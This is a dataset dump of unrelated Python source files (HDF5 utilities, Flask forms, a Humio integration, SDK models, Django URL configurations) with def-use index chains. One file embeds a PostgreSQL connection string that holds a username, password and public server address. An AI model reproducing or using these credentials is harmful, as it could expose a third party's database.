code (stringlengths 10–805k) | def_use_chains (sequencelengths 0–667) |
---|---|
'''HDF5 operating system operations.
license: HDF5Application/license.txt
Main authors:
Philipp Bucher
Michael Andre
'''
import KratosMultiphysics
import KratosMultiphysics.kratos_utilities as _utils
import os
class DeleteOldH5Files(object):
'''Delete h5-files from previous simulations.'''
def __call__(self, model_part, hdf5_file):
file_path, file_name = os.path.split(hdf5_file.GetFileName())
time_prefix = file_name.replace(".h5", "") + "-"
current_time = model_part.ProcessInfo[KratosMultiphysics.TIME]
if file_path == "":
file_path = "." # os.listdir fails with empty path
for name in os.listdir(file_path):
if name.startswith(time_prefix):
file_time = float(name.replace(".h5", "")[len(time_prefix):])
if file_time > current_time:
_utils.DeleteFileIfExisting(
os.path.join(file_path, name))
def Create(settings):
'''Return an operation specified by the setting's 'operation_type'.
This method is normally not used directly, but rather it is imported
in core.operations.model_part.Create using the 'module_name' setting.
'''
operation_type = settings['operation_type'].GetString()
if operation_type == 'delete_old_h5_files':
return DeleteOldH5Files()
else:
raise ValueError(
'"operation_type" has invalid value "' + operation_type + '"')
| [[[138, 156], [528, 546]], [[164, 209], [876, 882]], [[217, 219], [386, 388], [665, 667], [929, 931]], [[228, 244], [1335, 1351]], [[966, 972]]] |
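A minimal usage sketch for the factory above, assuming a Kratos environment where KratosMultiphysics.Parameters can be built from a JSON string; the settings object only needs to expose ["operation_type"].GetString().
import KratosMultiphysics

settings = KratosMultiphysics.Parameters('''{
    "operation_type": "delete_old_h5_files"
}''')
delete_op = Create(settings)        # returns a DeleteOldH5Files instance
# Inside the output loop (model_part and hdf5_file are provided by the HDF5 application):
# delete_op(model_part, hdf5_file)  # removes <file>-<time>.h5 files whose time is greater than the current TIME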
from flask_wtf import FlaskForm
from wtforms import StringField,TextAreaField,SubmitField, SelectField
from wtforms.validators import Required
class CommentsForm(FlaskForm):
comment = TextAreaField('Comment', validators=[Required()])
submit = SubmitField('SUBMIT')
class UpdateProfile(FlaskForm):
bio = TextAreaField('Tell us about you.',validators = [Required()])
submit = SubmitField('Submit')
class BlogForm(FlaskForm):
title = StringField('Enter title',validators = [Required()])
subtitle= StringField('Enter subtitle',validators = [Required()])
content = TextAreaField('make a blog', validators=[Required()])
    submit = SubmitField('Create Blog') | [[[22, 31], [164, 173], [295, 304], [431, 440]], [[52, 63], [455, 466], [522, 533]], [[64, 77], [190, 203], [317, 330], [592, 605]], [[78, 89], [253, 264], [392, 403], [659, 670]], [[91, 102]], [[134, 142], [227, 235], [366, 374], [495, 503], [565, 573], [633, 641]], [[151, 163]], [[281, 294]], [[422, 430]]] |
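A hedged sketch of driving BlogForm from a Flask view; the route, template name, and SECRET_KEY are placeholders, and note that recent WTForms releases expose the Required validator as DataRequired.
from flask import Flask, redirect, render_template, url_for

app = Flask(__name__)
app.config['SECRET_KEY'] = 'change-me'   # required by Flask-WTF for CSRF protection

@app.route('/blog/new', methods=['GET', 'POST'])
def new_blog():
    form = BlogForm()
    if form.validate_on_submit():        # POST with a valid CSRF token and passing validators
        title, content = form.title.data, form.content.data
        # ... persist the post here ...
        return redirect(url_for('new_blog'))
    return render_template('new_blog.html', blog_form=form)   # hypothetical template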
"""
NLP Sandbox Date Annotator API
# Overview The OpenAPI specification implemented by NLP Sandbox Annotators. # noqa: E501
The version of the OpenAPI document: 1.1.1
Contact: thomas.schaffter@sagebionetworks.org
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import nlpsandbox
from nlpsandbox.model.text_covid_symptom_annotation import TextCovidSymptomAnnotation
globals()['TextCovidSymptomAnnotation'] = TextCovidSymptomAnnotation
from nlpsandbox.model.text_covid_symptom_annotation_response import TextCovidSymptomAnnotationResponse
class TestTextCovidSymptomAnnotationResponse(unittest.TestCase):
"""TextCovidSymptomAnnotationResponse unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testTextCovidSymptomAnnotationResponse(self):
"""Test TextCovidSymptomAnnotationResponse"""
# FIXME: construct object with mandatory attributes with example values
# model = TextCovidSymptomAnnotationResponse() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [[[295, 298]], [[306, 314], [639, 647], [1097, 1105]], [[323, 333]], [[393, 419], [462, 488]], [[557, 591]], [[600, 638]]] |
import json
from datetime import datetime
from typing import Dict
import requests
import demistomock as demisto
from CommonServerPython import *
""" IMPORTS """
# Disable insecure warnings from urllib3
# - this does not disable SSL checking, just the warnings logged from urllib3
requests.packages.urllib3.disable_warnings()
""" CLASS for Humio"""
class Client:
def __init__(self, base_url, verify, proxies):
self.base_url = base_url
self.verify = verify
self.proxies = proxies
def http_request(self, method, url_suffix, data=None, headers=None):
server = self.base_url + url_suffix
res = requests.request(
method,
server,
json=data,
verify=self.verify,
headers=headers,
proxies=self.proxies,
)
return res
def test_module(client, headers=None):
response = client.http_request("GET", "/api/v1/status")
headers = {} if headers is None else headers
if response.status_code == 200:
try:
resp = response.json()
except Exception:
return "Could connect to server, but got unexpected response: {}".format(
response.text
)
if resp["status"].lower() == "ok":
incidentquery = demisto.params().get("queryParameter")
incidentrepo = demisto.params().get("queryRepository")
if incidentquery is not None and incidentrepo is not None:
args = {
"queryString": incidentquery,
"repository": incidentrepo,
"start": "1m",
"end": "now",
"isLive": "false",
"timeZoneOffsetMinutes": 0,
}
humio_query(client, args, headers)
return "ok"
else:
return "ok"
else:
return "Bad status from server: ({}) {}".format(
response.status_code, response.text
)
def humio_query(client, args, headers):
data = {}
data["queryString"] = args.get("queryString")
try:
data["start"] = int(args.get("start"))
except ValueError:
data["start"] = args.get("start")
try:
data["end"] = int(args.get("end"))
except ValueError:
data["end"] = args.get("end")
data["isLive"] = args.get("isLive").lower() in ["true", "1", "t", "y", "yes"]
data["timeZoneOffsetMinutes"] = int(args.get("timeZoneOffsetMinutes", 0))
if args.get("arguments"):
data["arguments"] = args.get("arguments")
url = "/api/v1/repositories/" + args.get("repository") + "/query"
headers["Accept"] = "application/json"
response = client.http_request("POST", url, data, headers)
if response.status_code == 200:
result = response.json()
markdown = tableToMarkdown("Humio Query Results", result, removeNull=True)
outputs = {"Humio.Query": [result]}
return markdown, outputs, result
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_query_job(client, args, headers):
data = {}
data["queryString"] = args.get("queryString")
data["start"] = args.get("start")
data["end"] = args.get("end")
data["isLive"] = args.get("isLive").lower() in ["true", "1", "t", "y", "yes"]
data["timeZoneOffsetMinutes"] = int(args.get("timeZoneOffsetMinutes"))
if args.get("arguments"):
data["arguments"] = args.get("arguments")
url = "/api/v1/repositories/" + args.get("repository") + "/queryjobs"
headers["Accept"] = "application/json"
response = client.http_request("POST", url, data, headers)
if response.status_code == 200:
result = response.json()
markdown = tableToMarkdown("Humio Query Job", result, removeNull=True)
outputs = {"Humio.Job": result}
return markdown, outputs, result
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_poll(client, args, headers):
data: Dict[str, str] = {}
url = (
"/api/v1/repositories/"
+ args.get("repository")
+ "/queryjobs/"
+ args.get("id")
)
headers["Accept"] = "application/json"
response = client.http_request("GET", url, data, headers)
if response.status_code == 200:
result = response.json()
result["job_id"] = args.get("id")
markdown = tableToMarkdown(
"Humio Poll Result", result.get("events", []), removeNull=True
)
outputs = {"Humio.Result(val.job_id == obj.job_id)": result}
return markdown, outputs, result
elif response.status_code == 404:
raise ValueError(response.text)
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_delete_job(client, args, headers):
data: Dict[str, str] = {}
url = (
"/api/v1/repositories/"
+ args.get("repository")
+ "/queryjobs/"
+ args.get("id")
)
headers["Accept"] = "application/json"
response = client.http_request("DELETE", url, data, headers)
if response.status_code == 204:
return "Command executed. Status code " + str(response), None, None
elif response.status_code == 404:
raise ValueError(response.text)
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_list_alerts(client, args, headers):
data: Dict[str, str] = {}
url = "/api/v1/repositories/" + args.get("repository") + "/alerts"
headers["Accept"] = "application/json"
response = client.http_request("GET", url, data, headers)
if response.status_code == 200:
result = response.json()
markdown = tableToMarkdown("Humio Alerts", result, removeNull=True)
outputs = {"Humio.Alert(val.id == obj.id)": result}
return markdown, outputs, result
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_get_alert_by_id(client, args, headers):
data: Dict[str, str] = {}
url = "/api/v1/repositories/" + args.get("repository") + "/alerts/" + args.get("id")
headers["Accept"] = "application/json"
response = client.http_request("GET", url, data, headers)
if response.status_code == 200:
if not response.text:
raise ValueError("Alert with id " + str(args.get("id")) + " not found")
result = response.json()
markdown = tableToMarkdown("Humio Alerts", result, removeNull=True)
outputs = {"Humio.Alert(val.id == obj.id)": result}
return markdown, outputs, result
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_create_alert(client, args, headers):
fulldata = {}
data = {}
data["queryString"] = args.get("queryString")
data["start"] = args.get("start")
data["end"] = "now"
data["isLive"] = True
fulldata["name"] = args.get("name")
fulldata["description"] = args.get("description", "")
fulldata["throttleTimeMillis"] = int(args.get("throttleTimeMillis"))
fulldata["silenced"] = args.get("silenced", "false").lower() in [
"true",
"1",
"t",
"y",
"yes",
]
fulldata["notifiers"] = [
notifier for notifier in args.get("notifiers").split(",") if notifier
]
fulldata["labels"] = [label for label in args.get("labels", "").split(",") if label]
fulldata["query"] = data
url = "/api/v1/repositories/" + args.get("repository") + "/alerts"
headers["Accept"] = "application/json"
response = client.http_request("POST", url, fulldata, headers)
if response.status_code == 201:
result = response.json()
markdown = tableToMarkdown("Humio Alerts", result, removeNull=True)
outputs = {"Humio.Alert(val.id == obj.id)": result}
return markdown, outputs, result
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_delete_alert(client, args, headers):
data: Dict[str, str] = {}
url = "/api/v1/repositories/" + args.get("repository") + "/alerts/" + args.get("id")
headers["Accept"] = "application/json"
response = client.http_request("DELETE", url, data, headers)
if response.status_code == 204:
return ("Command executed. Status code " + str(response), None, None)
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_list_notifiers(client, args, headers):
data: Dict[str, str] = {}
url = "/api/v1/repositories/" + args.get("repository") + "/alertnotifiers"
headers["Accept"] = "application/json"
response = client.http_request("GET", url, data, headers)
if response.status_code == 200:
result = response.json()
markdown = tableToMarkdown("Humio Notifiers", result, removeNull=True)
outputs = {"Humio.Notifier(val.id == obj.id)": result}
return markdown, outputs, result
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_get_notifier_by_id(client, args, headers):
data: Dict[str, str] = {}
url = (
"/api/v1/repositories/"
+ args.get("repository")
+ "/alertnotifiers/"
+ args.get("id")
)
headers["Accept"] = "application/json"
response = client.http_request("GET", url, data, headers)
if response.status_code == 200:
if not response.text:
raise ValueError("Notifier with id " + str(args.get("id")) + " not found")
result = response.json()
markdown = tableToMarkdown("Humio Notifiers", result, removeNull=True)
outputs = {"Humio.Notifier(val.id == obj.id)": result}
return markdown, outputs, result
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def fetch_incidents(client, headers):
incidentquery = demisto.params().get("queryParameter")
incidentrepo = demisto.params().get("queryRepository")
timestampfrom = demisto.params().get("queryStartTime")
lastrun = demisto.getLastRun()
url = "/api/v1/repositories/" + incidentrepo + "/query"
headers["Accept"] = "application/json"
# set maximum of 50 returned events (this is idempotent)
incidentquery = incidentquery + "| head(50)"
backup_ts = int(datetime.now().timestamp()) * 1000
last_run_time = lastrun.get("time")
data = {
"queryString": incidentquery,
"end": "now",
"isLive": False,
"timeZoneOffsetMinutes": int(
demisto.params().get("queryTimeZoneOffsetMinutes")
),
}
if last_run_time is None:
# First run
data["start"] = timestampfrom
max_ts = 0
else:
data["start"] = int(last_run_time)
max_ts = int(last_run_time)
response = client.http_request("POST", url, data, headers)
if response.status_code == 200:
response_data = response.json()
for result in response_data:
ts = int(result.get("@timestamp", backup_ts))
if ts > max_ts:
max_ts = ts
max_ts += 1
demisto.setLastRun({"time": max_ts})
        return form_incidents(response_data)
else:
raise ValueError(
"Error in fetching incidents. Error from server was: " + str(response.text)
)
def create_incident_from_humioquery(incident):
occurred = datetime.fromtimestamp(incident["@timestamp"] / 1000.0).strftime(
"%Y-%m-%dT%H:%M:%SZ"
)
keys = incident.keys()
labels = []
for key in keys:
labels.append({"type": key, "value": str(incident[key])})
return {
"name": "Humio Incident {id}".format(id=incident["@id"]),
"labels": labels,
"rawJSON": json.dumps(incident),
"occurred": occurred,
}
def form_incidents(incidents):
returnableincidents = []
for item in incidents:
returnableincidents.append(create_incident_from_humioquery(item))
return returnableincidents
def main():
apikey = demisto.params().get("API-key")
baseserver = (
demisto.params()["url"][:-1]
if (demisto.params()["url"] and demisto.params()["url"].endswith("/"))
else demisto.params()["url"]
)
verify_certificate = not demisto.params().get("insecure", False)
proxies = handle_proxy()
headers = {}
headers["Content-Type"] = "application/json"
headers["Authorization"] = "Bearer " + apikey
command = demisto.command()
LOG(f"Command being called is {command}")
try:
client = Client(baseserver, verify_certificate, proxies)
commands = {
"humio-query": humio_query,
"humio-query-job": humio_query_job,
"humio-poll": humio_poll,
"humio-delete-job": humio_delete_job,
"humio-list-alerts": humio_list_alerts,
"humio-get-alert-by-id": humio_get_alert_by_id,
"humio-create-alert": humio_create_alert,
"humio-delete-alert": humio_delete_alert,
"humio-list-notifiers": humio_list_notifiers,
"humio-get-notifier-by-id": humio_get_notifier_by_id,
}
if command == "test-module":
results = test_module(client, headers)
return_outputs(results)
elif demisto.command() == "fetch-incidents":
demisto.incidents(fetch_incidents(client, headers))
elif command in commands:
return_outputs(*commands[command](client, demisto.args(), headers))
except Exception as e:
return_error(str(e))
if __name__ in ["__main__", "builtin", "builtins"]:
main()
| [
[
[
7,
11
],
[
11938,
11942
]
],
[
[
33,
41
],
[
10495,
10503
],
[
11583,
11591
]
],
[
[
61,
65
],
[
4106,
4110
],
[
4938,
4942
],
[
5544,
5548
],
[
6146,
6150
],
[
8170,
8174
],
[
8660,
8664
],
[
9279,
9283
]
],
[
[
74,
82
],
[
285,
293
],
[
646,
654
]
],
[
[
91,
113
],
[
1313,
1320
],
[
1379,
1386
],
[
10068,
10075
],
[
10126,
10133
],
[
10186,
10193
],
[
10239,
10246
],
[
10718,
10725
],
[
11302,
11309
],
[
12218,
12225
],
[
12318,
12325
],
[
12346,
12353
],
[
12277,
12284
],
[
12398,
12405
],
[
12457,
12464
],
[
12658,
12665
],
[
13484,
13491
],
[
13536,
13543
],
[
13676,
13683
]
],
[
[
145,
146
],
[
2882,
2897
],
[
3816,
3831
],
[
4493,
4508
],
[
5828,
5843
],
[
6562,
6577
],
[
7855,
7870
],
[
8952,
8967
],
[
9746,
9761
],
[
12511,
12523
],
[
12680,
12683
],
[
13447,
13461
],
[
13634,
13648
],
[
13737,
13749
]
],
[
[
362,
368
],
[
12748,
12754
]
],
[
[
857,
868
],
[
13406,
13417
]
],
[
[
2044,
2055
],
[
1803,
1814
],
[
12844,
12855
]
],
[
[
3135,
3150
],
[
12888,
12903
]
],
[
[
4061,
4071
],
[
12931,
12941
]
],
[
[
4887,
4903
],
[
12975,
12991
]
],
[
[
5492,
5509
],
[
13026,
13043
]
],
[
[
6090,
6111
],
[
13082,
13103
]
],
[
[
6824,
6842
],
[
13139,
13157
]
],
[
[
8117,
8135
],
[
13193,
13211
]
],
[
[
8605,
8625
],
[
13249,
13269
]
],
[
[
9220,
9244
],
[
13311,
13335
]
],
[
[
10014,
10029
],
[
13554,
13569
]
],
[
[
11525,
11556
],
[
12121,
12152
]
],
[
[
12002,
12017
],
[
11354,
11369
]
],
[
[
12197,
12201
],
[
13816,
13820
]
]
] |
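The snippet below isolates the last-run bookkeeping used by fetch_incidents above: the next poll starts one millisecond after the newest "@timestamp" seen, so events are not fetched twice. The names here are illustrative only, not part of the integration.
def next_start(events, last_run_time, fallback_ts=0):
    max_ts = int(last_run_time) if last_run_time is not None else 0
    for event in events:
        ts = int(event.get("@timestamp", fallback_ts))
        if ts > max_ts:
            max_ts = ts
    return max_ts + 1

print(next_start([{"@timestamp": 1700000000000}], None))   # 1700000000001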
# coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 9
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from isi_sdk_8_2_2.models.drives_drive_firmware_update_node_status import DrivesDriveFirmwareUpdateNodeStatus # noqa: F401,E501
class DrivesDriveFirmwareUpdateNode(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'error': 'str',
'id': 'int',
'lnn': 'int',
'status': 'DrivesDriveFirmwareUpdateNodeStatus'
}
attribute_map = {
'error': 'error',
'id': 'id',
'lnn': 'lnn',
'status': 'status'
}
def __init__(self, error=None, id=None, lnn=None, status=None): # noqa: E501
"""DrivesDriveFirmwareUpdateNode - a model defined in Swagger""" # noqa: E501
self._error = None
self._id = None
self._lnn = None
self._status = None
self.discriminator = None
if error is not None:
self.error = error
if id is not None:
self.id = id
if lnn is not None:
self.lnn = lnn
if status is not None:
self.status = status
@property
def error(self):
"""Gets the error of this DrivesDriveFirmwareUpdateNode. # noqa: E501
Error message, if the HTTP status returned from this node was not 200. # noqa: E501
:return: The error of this DrivesDriveFirmwareUpdateNode. # noqa: E501
:rtype: str
"""
return self._error
@error.setter
def error(self, error):
"""Sets the error of this DrivesDriveFirmwareUpdateNode.
Error message, if the HTTP status returned from this node was not 200. # noqa: E501
:param error: The error of this DrivesDriveFirmwareUpdateNode. # noqa: E501
:type: str
"""
if error is not None and len(error) > 8192:
raise ValueError("Invalid value for `error`, length must be less than or equal to `8192`") # noqa: E501
if error is not None and len(error) < 0:
raise ValueError("Invalid value for `error`, length must be greater than or equal to `0`") # noqa: E501
self._error = error
@property
def id(self):
"""Gets the id of this DrivesDriveFirmwareUpdateNode. # noqa: E501
Node ID (Device Number) of a node. # noqa: E501
:return: The id of this DrivesDriveFirmwareUpdateNode. # noqa: E501
:rtype: int
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this DrivesDriveFirmwareUpdateNode.
Node ID (Device Number) of a node. # noqa: E501
:param id: The id of this DrivesDriveFirmwareUpdateNode. # noqa: E501
:type: int
"""
if id is not None and id > 2147483647: # noqa: E501
raise ValueError("Invalid value for `id`, must be a value less than or equal to `2147483647`") # noqa: E501
if id is not None and id < 0: # noqa: E501
raise ValueError("Invalid value for `id`, must be a value greater than or equal to `0`") # noqa: E501
self._id = id
@property
def lnn(self):
"""Gets the lnn of this DrivesDriveFirmwareUpdateNode. # noqa: E501
Logical Node Number (LNN) of a node. # noqa: E501
:return: The lnn of this DrivesDriveFirmwareUpdateNode. # noqa: E501
:rtype: int
"""
return self._lnn
@lnn.setter
def lnn(self, lnn):
"""Sets the lnn of this DrivesDriveFirmwareUpdateNode.
Logical Node Number (LNN) of a node. # noqa: E501
:param lnn: The lnn of this DrivesDriveFirmwareUpdateNode. # noqa: E501
:type: int
"""
if lnn is not None and lnn > 65535: # noqa: E501
raise ValueError("Invalid value for `lnn`, must be a value less than or equal to `65535`") # noqa: E501
if lnn is not None and lnn < 1: # noqa: E501
raise ValueError("Invalid value for `lnn`, must be a value greater than or equal to `1`") # noqa: E501
self._lnn = lnn
@property
def status(self):
"""Gets the status of this DrivesDriveFirmwareUpdateNode. # noqa: E501
Drive firmware update status information. # noqa: E501
:return: The status of this DrivesDriveFirmwareUpdateNode. # noqa: E501
:rtype: DrivesDriveFirmwareUpdateNodeStatus
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this DrivesDriveFirmwareUpdateNode.
Drive firmware update status information. # noqa: E501
:param status: The status of this DrivesDriveFirmwareUpdateNode. # noqa: E501
:type: DrivesDriveFirmwareUpdateNodeStatus
"""
self._status = status
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, DrivesDriveFirmwareUpdateNode):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [[[243, 249], [6253, 6259]], [[257, 259]], [[282, 285], [5449, 5452]], [[361, 396]], [[424, 453], [6493, 6522]]] |
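A short usage sketch for the generated model above (requires the isi_sdk_8_2_2 package on the import path).
node = DrivesDriveFirmwareUpdateNode(id=1, lnn=1)
print(node.to_dict())    # {'error': None, 'id': 1, 'lnn': 1, 'status': None}
print(node == DrivesDriveFirmwareUpdateNode(id=1, lnn=1))   # True
try:
    node.lnn = 0         # the setter enforces 1 <= lnn <= 65535
except ValueError as exc:
    print(exc)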
#! /usr/bin/env python
# -*- coding: utf-8 -*-
from django.conf.urls import url, include
from branches import region, branch, resource
urlpatterns = [
url(r'^$', region.region_list, name='branches'),
url(r'^region/add/$', region.region_add, name='region_add'),
url(r'^region/list/$', region.region_list, name='region_list'),
url(r'^region/branch_detail/(?P<region_id>\d+)/$', region.branch_detail, name='branch_detail'),
url(r'^region/edit/(?P<region_id>\d+)/$', region.region_edit, name='region_edit'),
url(r'^region/delete/$', region.region_del, name='region_del'),
url(r'^branch/add/$', branch.branch_add, name='branch_add'),
url(r'^branch/list/$', branch.branch_list, name='branch_list'),
url(r'^branch/edit/(?P<branch_id>\d+)/$', branch.branch_edit, name='branch_edit'),
url(r'^branch/delete/$', branch.branch_del, name='branch_del'),
url(r'^branch/export/$', branch.branch_export, name='branch_export'),
url(r'^branch/resource_detail/(?P<branch_id>\d+)/$', branch.resource_detail, name='resource_detail'),
url(r'^resource/add/$', resource.resource_add, name='resource_add'),
url(r'^resource/list/$', resource.resource_list, name='resource_list'),
url(r'^resource/edit/(?P<resource_id>\d+)/$', resource.resource_edit, name='resource_edit'),
url(r'^resource/delete/$', resource.resource_del, name='resource_del'),
url(r'^resource/export/$', resource.resource_export, name='resource_export'),
] | [
[
[
76,
79
],
[
156,
159
],
[
209,
212
],
[
274,
277
],
[
342,
345
],
[
442,
445
],
[
529,
532
],
[
597,
600
],
[
662,
665
],
[
730,
733
],
[
817,
820
],
[
885,
888
],
[
959,
962
],
[
1065,
1068
],
[
1138,
1141
],
[
1214,
1217
],
[
1311,
1314
],
[
1387,
1390
]
],
[
[
81,
88
]
],
[
[
110,
116
],
[
167,
173
],
[
231,
237
],
[
297,
303
],
[
393,
399
],
[
484,
490
],
[
554,
560
]
],
[
[
118,
124
],
[
619,
625
],
[
685,
691
],
[
772,
778
],
[
842,
848
],
[
910,
916
],
[
1012,
1018
]
],
[
[
126,
134
],
[
1089,
1097
],
[
1163,
1171
],
[
1260,
1268
],
[
1338,
1346
],
[
1414,
1422
]
],
[
[
136,
147
]
]
] |
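A brief sketch of resolving these named patterns with Django's reverse(); it only works inside a configured project, and the resulting paths also depend on where this URLconf is include()d.
from django.urls import reverse

edit_url = reverse('branch_edit', args=[3])                      # matches r'^branch/edit/(?P<branch_id>\d+)/$'
detail_url = reverse('resource_detail', kwargs={'branch_id': 7})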
"""awards URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from django.contrib.auth import views
from rest_framework.authtoken.views import obtain_auth_token
urlpatterns = [
url(r'^admin/', admin.site.urls),
url('', include('project.urls')),
url(r'^accounts/', include('registration.backends.simple.urls')),
url(r'^logout/$', views.logout, {"next_page": '/'} ),
url(r'^api-token-auth/', obtain_auth_token),
]
| [[[669, 672], [835, 838], [873, 876], [911, 914], [981, 984], [1039, 1042]], [[674, 681], [881, 888], [930, 937]], [[709, 714], [851, 856]], [[747, 752], [999, 1004]], [[796, 813], [1064, 1081]], [[815, 826]]] |
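A hedged example of hitting the api-token-auth endpoint wired above to obtain a DRF token; the host and credentials are placeholders.
import requests

resp = requests.post(
    "http://localhost:8000/api-token-auth/",
    data={"username": "demo", "password": "demo-pass"},
)
print(resp.status_code, resp.json())   # 200 and {"token": "..."} for valid credentials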
import requests
import sqlalchemy
import xmltodict
from sqlalchemy import create_engine, MetaData
from collections import defaultdict
import datetime
from utils import *
class Capture(object):
def __init__(self,
schema,
database='projetocurio'
):
self.schema = schema
self.database = database
self.engine = self.connect_to_db()
self.meta = self.load_db_schema()
self.url = None
self.data = None
def connect_to_db(self):
return create_engine('postgresql://uploaddata:VgyBhu876%%%@104.155.150.247:5432/projetocurio')
def load_db_schema(self):
metadata = MetaData()
metadata.reflect(self.engine, schema='camara_v1')
return metadata
def request(self, url):
data = requests.get(url)
if data.status_code == 200:
self.data = data.text
else:
self.data = None
def xml_to_dict(self):
self.data = xmltodict.parse(self.data)
def to_default_dict(self, list_of_dic):
return [defaultdict(lambda: None, dic) for dic in force_list(list_of_dic)]
def capture_data(self, url):
self.request(url)
self.xml_to_dict()
def insert_data(self, list_of_dic, table):
table_string = self.schema + '.' + table
with self.engine.connect() as conn:
print('inserting data')
for dic in list_of_dic:
conn.execute(self.meta.tables[table_string].insert(), dic)
            print('closing connection') | [[[7, 15], [845, 853]], [[23, 33]], [[41, 50], [1029, 1038]], [[74, 87], [568, 581]], [[89, 97], [707, 715]], [[122, 133], [1118, 1129]], [[141, 149]], [[168, 169], [1160, 1170]], [[177, 184]]] |
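A usage sketch under explicit assumptions: the endpoint URL and XML keys are hypothetical, force_list() comes from the project's utils module, and instantiating Capture reflects the 'camara_v1' schema from the hard-coded Postgres server, so a reachable database is required.
cap = Capture(schema='camara_v1')
cap.capture_data('https://example.org/api/deputados.xml')          # hypothetical endpoint
records = cap.to_default_dict(cap.data['deputados']['deputado'])   # hypothetical XML layout
cap.insert_data(records, 'deputados')                              # inserts into camara_v1.deputados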
# -*- coding: utf-8 -*-
# Copyright 2013-2017 Ent. Services Development Corporation LP
#
# Redistribution and use of this software in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
Pyramid views for Eucalyptus and AWS key pairs
"""
import simplejson as json
from boto.exception import BotoServerError
from pyramid.httpexceptions import HTTPFound
from pyramid.view import view_config
from pyramid.response import Response
from ..forms.keypairs import KeyPairForm, KeyPairImportForm, KeyPairDeleteForm
from ..i18n import _
from ..models import Notification
from ..views import BaseView, LandingPageView, JSONResponse
from . import boto_error_handler
class KeyPairsView(LandingPageView):
def __init__(self, request):
super(KeyPairsView, self).__init__(request)
self.title_parts = [_(u'Key Pairs')]
self.initial_sort_key = 'name'
self.prefix = '/keypairs'
self.delete_form = KeyPairDeleteForm(self.request, formdata=self.request.params or None)
self.enable_smart_table = True
@view_config(route_name='keypairs', renderer='../templates/keypairs/keypairs.pt')
def keypairs_landing(self):
json_items_endpoint = self.request.route_path('keypairs_json')
# filter_keys are passed to client-side filtering in search box
self.filter_keys = ['name', 'fingerprint']
# sort_keys are passed to sorting drop-down
self.sort_keys = [
dict(key='name', name=_(u'Name: A to Z')),
dict(key='-name', name=_(u'Name: Z to A')),
]
return dict(
filter_keys=self.filter_keys,
search_facets=[],
sort_keys=self.sort_keys,
prefix=self.prefix,
initial_sort_key=self.initial_sort_key,
json_items_endpoint=json_items_endpoint,
delete_form=self.delete_form,
)
class KeyPairsJsonView(BaseView):
def __init__(self, request):
super(KeyPairsJsonView, self).__init__(request)
self.conn = self.get_connection()
@view_config(route_name='keypairs_json', renderer='json', request_method='POST')
def keypairs_json(self):
if not(self.is_csrf_valid()):
return JSONResponse(status=400, message="missing CSRF token")
keypairs = []
with boto_error_handler(self.request):
for keypair in self.get_items():
keypairs.append(dict(
